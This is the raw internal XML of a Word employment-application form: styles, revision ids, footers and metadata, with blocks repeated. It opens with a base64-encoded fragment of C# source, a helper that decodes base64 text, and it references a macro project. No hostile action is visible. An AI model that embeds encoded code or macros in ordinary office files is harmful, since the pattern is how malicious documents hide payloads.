aWMgcHVibGljIHN0cmluZyBEZWNvZGVGcm9tNjQoc3RyaW5nIHRvRGVjb2RlKQogICAgICAgIHsKICAgICAgICAgICAgYnl0ZVtdIGRlY29kZUFzQnl0ZXMgID0gQ29udmVydC5Gcm9tQmFzZTY0U3RyaW5nKHRvRGVjb2RlKTsKICAgICAgICAgICAgU3RyaW5nIGRlY29kZWQgPSBTeXN0ZW0uVGV4dC5BU0NJSUVuY29kaW5nLkFTQ0lJLkdldFN0cmluZyhkZWNvZGVBc0J5dGVzKTsKICAgICAgICAgICAgcmV0dXJuIGRlY29kZWQ7CiAgICAgICAgfQogICAgfQp9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F6E87" w:rsidRPr="004E34C6" w:rsidSect="00856C35">
      <w:footerReference w:type="default" r:id="rId13"/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D8181C1" w14:textId="77777777" w:rsidR="00716C74" w:rsidRDefault="00716C74" w:rsidP="00176E67">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="71F782C7" w14:textId="77777777" w:rsidR="00716C74" w:rsidRDefault="00716C74" w:rsidP="00176E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9631626"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="369C2F83" w14:textId="77777777" w:rsidR="00176E67" w:rsidRDefault="00C8155B">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00480163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1BC9396" w14:textId="77777777" w:rsidR="00716C74" w:rsidRDefault="00716C74" w:rsidP="00176E67">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="592E2FD7" w14:textId="77777777" w:rsidR="00716C74" w:rsidRDefault="00716C74" w:rsidP="00176E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ocumentProtection w:edit="forms" w:enforcement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78A4"/>
    <w:rsid w:val="000071F7"/>
    <w:rsid w:val="00010B00"/>
    <w:rsid w:val="00023D03"/>
    <w:rsid w:val="0002798A"/>
    <w:rsid w:val="00083002"/>
    <w:rsid w:val="00087B85"/>
    <w:rsid w:val="000A01F1"/>
    <w:rsid w:val="000C1163"/>
    <w:rsid w:val="000C797A"/>
    <w:rsid w:val="000D0410"/>
    <w:rsid w:val="000D2539"/>
    <w:rsid w:val="000D2BB8"/>
    <w:rsid w:val="000F2DF4"/>
    <w:rsid w:val="000F6783"/>
    <w:rsid w:val="00120C95"/>
    <w:rsid w:val="0014663E"/>
    <w:rsid w:val="00155D45"/>
    <w:rsid w:val="00176E67"/>
    <w:rsid w:val="00180664"/>
    <w:rsid w:val="001903F7"/>
    <w:rsid w:val="0019395E"/>
    <w:rsid w:val="001A4440"/>
    <w:rsid w:val="001A6758"/>
    <w:rsid w:val="001D6B76"/>
    <w:rsid w:val="002114B4"/>
    <w:rsid w:val="00211828"/>
    <w:rsid w:val="00250014"/>
    <w:rsid w:val="002578A4"/>
    <w:rsid w:val="00275BB5"/>
    <w:rsid w:val="00286F6A"/>
    <w:rsid w:val="00291C8C"/>
    <w:rsid w:val="002A1ECE"/>
    <w:rsid w:val="002A2510"/>
    <w:rsid w:val="002A6FA9"/>
    <w:rsid w:val="002B11FE"/>
    <w:rsid w:val="002B3790"/>
    <w:rsid w:val="002B4D1D"/>
    <w:rsid w:val="002C10B1"/>
    <w:rsid w:val="002D222A"/>
    <w:rsid w:val="002E0497"/>
    <w:rsid w:val="003076FD"/>
    <w:rsid w:val="00317005"/>
    <w:rsid w:val="003240ED"/>
    <w:rsid w:val="00330050"/>
    <w:rsid w:val="00335259"/>
    <w:rsid w:val="00344F72"/>
    <w:rsid w:val="003929F1"/>
    <w:rsid w:val="003A0B93"/>
    <w:rsid w:val="003A1B63"/>
    <w:rsid w:val="003A41A1"/>
    <w:rsid w:val="003B2326"/>
    <w:rsid w:val="003F7439"/>
    <w:rsid w:val="00400251"/>
    <w:rsid w:val="004306BC"/>
    <w:rsid w:val="00437ED0"/>
    <w:rsid w:val="00440CD8"/>
    <w:rsid w:val="00443837"/>
    <w:rsid w:val="00447DAA"/>
    <w:rsid w:val="00450F66"/>
    <w:rsid w:val="00461739"/>
    <w:rsid w:val="00467865"/>
    <w:rsid w:val="00480163"/>
    <w:rsid w:val="0048685F"/>
    <w:rsid w:val="00490804"/>
    <w:rsid w:val="00493809"/>
    <w:rsid w:val="0049524C"/>
    <w:rsid w:val="004A1437"/>
    <w:rsid w:val="004A3CEA"/>
    <w:rsid w:val="004A4198"/>
    <w:rsid w:val="004A54EA"/>
    <w:rsid w:val="004B0578"/>
    <w:rsid w:val="004E34C6"/>
    <w:rsid w:val="004F62AD"/>
    <w:rsid w:val="00501AE8"/>
    <w:rsid w:val="00504B65"/>
    <w:rsid w:val="005114CE"/>
    <w:rsid w:val="0052122B"/>
    <w:rsid w:val="00535509"/>
    <w:rsid w:val="0053767B"/>
    <w:rsid w:val="005557F6"/>
    <w:rsid w:val="00563778"/>
    <w:rsid w:val="00567FCC"/>
    <w:rsid w:val="005A0F34"/>
    <w:rsid w:val="005A4840"/>
    <w:rsid w:val="005B0F5D"/>
    <w:rsid w:val="005B4AE2"/>
    <w:rsid w:val="005C6576"/>
    <w:rsid w:val="005D352C"/>
    <w:rsid w:val="005E63CC"/>
    <w:rsid w:val="005F59AC"/>
    <w:rsid w:val="005F6E87"/>
    <w:rsid w:val="00602863"/>
    <w:rsid w:val="00607FED"/>
    <w:rsid w:val="00613129"/>
    <w:rsid w:val="00617C65"/>
    <w:rsid w:val="0063459A"/>
    <w:rsid w:val="0066126B"/>
    <w:rsid w:val="00682C69"/>
    <w:rsid w:val="00694955"/>
    <w:rsid w:val="006A3EDF"/>
    <w:rsid w:val="006D2635"/>
    <w:rsid w:val="006D779C"/>
    <w:rsid w:val="006E4F63"/>
    <w:rsid w:val="006E729E"/>
    <w:rsid w:val="00716C74"/>
    <w:rsid w:val="00722A00"/>
    <w:rsid w:val="00724FA4"/>
    <w:rsid w:val="007325A9"/>
    <w:rsid w:val="0075451A"/>
    <w:rsid w:val="007602AC"/>
    <w:rsid w:val="00774B67"/>
    <w:rsid w:val="00786E50"/>
    <w:rsid w:val="00793AC6"/>
    <w:rsid w:val="007A71DE"/>
    <w:rsid w:val="007B199B"/>
    <w:rsid w:val="007B6119"/>
    <w:rsid w:val="007C1DA0"/>
    <w:rsid w:val="007C71B8"/>
    <w:rsid w:val="007D71CC"/>
    <w:rsid w:val="007E2A15"/>
    <w:rsid w:val="007E56C4"/>
    <w:rsid w:val="007F3D5B"/>
    <w:rsid w:val="007F6D6D"/>
    <w:rsid w:val="008107D6"/>
    <w:rsid w:val="00841645"/>
    <w:rsid w:val="00852EC6"/>
    <w:rsid w:val="00856C35"/>
    <w:rsid w:val="008634F1"/>
    <w:rsid w:val="00871876"/>
    <w:rsid w:val="008753A7"/>
    <w:rsid w:val="0088782D"/>
    <w:rsid w:val="008B7081"/>
    <w:rsid w:val="008D7A67"/>
    <w:rsid w:val="008F2F8A"/>
    <w:rsid w:val="008F5BCD"/>
    <w:rsid w:val="00902964"/>
    <w:rsid w:val="00920507"/>
    <w:rsid w:val="00933455"/>
    <w:rsid w:val="00944FEF"/>
    <w:rsid w:val="0094790F"/>
    <w:rsid w:val="00966B90"/>
    <w:rsid w:val="00967A12"/>
    <w:rsid w:val="009737B7"/>
    <w:rsid w:val="009802C4"/>
    <w:rsid w:val="00984044"/>
    <w:rsid w:val="009976D9"/>
    <w:rsid w:val="00997A3E"/>
    <w:rsid w:val="009A12D5"/>
    <w:rsid w:val="009A4EA3"/>
    <w:rsid w:val="009A55DC"/>
    <w:rsid w:val="009B364B"/>
    <w:rsid w:val="009C220D"/>
    <w:rsid w:val="009D1353"/>
    <w:rsid w:val="009F1317"/>
    <w:rsid w:val="00A211B2"/>
    <w:rsid w:val="00A2330C"/>
    <w:rsid w:val="00A2727E"/>
    <w:rsid w:val="00A35524"/>
    <w:rsid w:val="00A556DD"/>
    <w:rsid w:val="00A60C9E"/>
    <w:rsid w:val="00A74F99"/>
    <w:rsid w:val="00A82BA3"/>
    <w:rsid w:val="00A94ACC"/>
    <w:rsid w:val="00AA2EA7"/>
    <w:rsid w:val="00AE6FA4"/>
    <w:rsid w:val="00B01CCF"/>
    <w:rsid w:val="00B03907"/>
    <w:rsid w:val="00B11811"/>
    <w:rsid w:val="00B311E1"/>
    <w:rsid w:val="00B358EB"/>
    <w:rsid w:val="00B4735C"/>
    <w:rsid w:val="00B579DF"/>
    <w:rsid w:val="00B74822"/>
    <w:rsid w:val="00B90EC2"/>
    <w:rsid w:val="00B91167"/>
    <w:rsid w:val="00BA23D2"/>
    <w:rsid w:val="00BA268F"/>
    <w:rsid w:val="00BC07E3"/>
    <w:rsid w:val="00BD103E"/>
    <w:rsid w:val="00BE4E2A"/>
    <w:rsid w:val="00C079CA"/>
    <w:rsid w:val="00C222C8"/>
    <w:rsid w:val="00C45FDA"/>
    <w:rsid w:val="00C67741"/>
    <w:rsid w:val="00C74647"/>
    <w:rsid w:val="00C76039"/>
    <w:rsid w:val="00C76480"/>
    <w:rsid w:val="00C80AD2"/>
    <w:rsid w:val="00C8155B"/>
    <w:rsid w:val="00C92A3C"/>
    <w:rsid w:val="00C92FD6"/>
    <w:rsid w:val="00CC69AF"/>
    <w:rsid w:val="00CE5DC7"/>
    <w:rsid w:val="00CE7D54"/>
    <w:rsid w:val="00D10D9A"/>
    <w:rsid w:val="00D14896"/>
    <w:rsid w:val="00D14E73"/>
    <w:rsid w:val="00D4666B"/>
    <w:rsid w:val="00D55AFA"/>
    <w:rsid w:val="00D6155E"/>
    <w:rsid w:val="00D83A19"/>
    <w:rsid w:val="00D86A85"/>
    <w:rsid w:val="00D90A75"/>
    <w:rsid w:val="00DA4514"/>
    <w:rsid w:val="00DC47A2"/>
    <w:rsid w:val="00DE1551"/>
    <w:rsid w:val="00DE1A09"/>
    <w:rsid w:val="00DE7FB7"/>
    <w:rsid w:val="00E106E2"/>
    <w:rsid w:val="00E20DDA"/>
    <w:rsid w:val="00E32A8B"/>
    <w:rsid w:val="00E36054"/>
    <w:rsid w:val="00E37E7B"/>
    <w:rsid w:val="00E46E04"/>
    <w:rsid w:val="00E87396"/>
    <w:rsid w:val="00E96F6F"/>
    <w:rsid w:val="00EA30D3"/>
    <w:rsid w:val="00EB478A"/>
    <w:rsid w:val="00EC42A3"/>
    <w:rsid w:val="00ED31E3"/>
    <w:rsid w:val="00ED4804"/>
    <w:rsid w:val="00F14F49"/>
    <w:rsid w:val="00F4725A"/>
    <w:rsid w:val="00F83033"/>
    <w:rsid w:val="00F966AA"/>
    <w:rsid w:val="00FB538F"/>
    <w:rsid w:val="00FC3071"/>
    <w:rsid w:val="00FD5902"/>
    <w:rsid w:val="00FF13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DDDF4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6E67"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="19"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00856C35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176E67"/>
    <w:pPr>
      <w:keepNext/>
      <w:shd w:val="clear" w:color="auto" w:fill="595959" w:themeFill="text1" w:themeFillTint="A6"/>
      <w:spacing w:before="200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490804"/>
    <w:pPr>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:sz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0804"/>
    <w:pPr>
      <w:jc w:val="right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90804"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="19"/>
      <w:szCs w:val="24"/>
    </w:rPr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Italic">
    <w:name w:val="Italic"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00490804"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="60"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Checkbox">
    <w:name w:val="Checkbox"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00490804"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="17"/>
      <w:szCs w:val="19"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FieldText">
    <w:name w:val="Field Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FieldTextChar"/>
    <w:qFormat/>
    <w:rsid w:val="00490804"/>
    <w:rPr>
      <w:b/>
      <w:szCs w:val="19"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FieldTextChar">
    <w:name w:val="Field Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="FieldText"/>
    <w:rsid w:val="00490804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856C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">
    <w:name w:val="Company Name"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00176E67"/>
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00176E6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E67"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="19"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00176E67"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00176E67"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="19"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="GridTableLight">
    <w:name w:val="Grid Table Light"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="40"/>
    <w:rsid w:val="00602863"/>
    <w:tblPr>
      <w:tblCellMar>
        <w:left w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="PlainTable3">
    <w:name w:val="Plain Table 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="43"/>
    <w:rsid w:val="00602863"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:vAlign w:val="bottom"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow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5A0F34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6E67"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="19"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00856C35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176E67"/>
    <w:pPr>
      <w:keepNext/>
      <w:shd w:val="clear" w:color="auto" w:fill="595959" w:themeFill="text1" w:themeFillTint="A6"/>
      <w:spacing w:before="200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490804"/>
    <w:pPr>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:sz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0804"/>
    <w:pPr>
      <w:jc w:val="right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90804"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="19"/>
      <w:szCs w:val="24"/>
    </w:rPr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Italic">
    <w:name w:val="Italic"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00490804"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="60"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Checkbox">
    <w:name w:val="Checkbox"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00490804"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="17"/>
      <w:szCs w:val="19"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FieldText">
    <w:name w:val="Field Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FieldTextChar"/>
    <w:qFormat/>
    <w:rsid w:val="00490804"/>
    <w:rPr>
      <w:b/>
      <w:szCs w:val="19"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FieldTextChar">
    <w:name w:val="Field Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="FieldText"/>
    <w:rsid w:val="00490804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856C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">
    <w:name w:val="Company Name"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00176E67"/>
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00176E6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E67"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="19"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00176E67"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00176E67"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="19"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="GridTableLight">
    <w:name w:val="Grid Table Light"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="40"/>
    <w:rsid w:val="00602863"/>
    <w:tblPr>
      <w:tblCellMar>
        <w:left w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="PlainTable3">
    <w:name w:val="Plain Table 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="43"/>
    <w:rsid w:val="00602863"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:vAlign w:val="bottom"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow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5A0F34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NTRY" wne:name="Project.NewMacros.En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 xsi:nil="true"/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2021-12-16T09:54:56+00:00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/>
    <APAuthor xmlns="4873beb7-5857-4685-be1f-d57550cc96cc">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/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false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 xsi:nil="true"/>
    <MachineTranslated xmlns="4873beb7-5857-4685-be1f-d57550cc96cc">false</MachineTranslated>
    <OutputCachingOn xmlns="4873beb7-5857-4685-be1f-d57550cc96cc">false</OutputCachingOn>
    <TemplateStatus xmlns="4873beb7-5857-4685-be1f-d57550cc96cc" xsi:nil="true"/>
    <IsSearchable xmlns="4873beb7-5857-4685-be1f-d57550cc96cc">false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false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 xsi:nil="true"/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 xsi:nil="true"/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F57ABFAE-9857-4724-9BA6-F946631653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D3E8D71-0DA9-4A08-BE43-C88C6E5C8F3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EE564E-CF79-4472-AD09-FEF67B699262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3</Pages>
  <Words>334</Words>
  <Characters>2531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Employment application</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2860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Employment application</dc:title>
  <dc:creator>André Brandão</dc:creator>
  <cp:lastModifiedBy>User</cp:lastModifiedBy>
  <cp:revision>41</cp:revision>
  <cp:lastPrinted>2002-05-23T18:14:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-16T09:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-20T17:44:00Z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TC060888241033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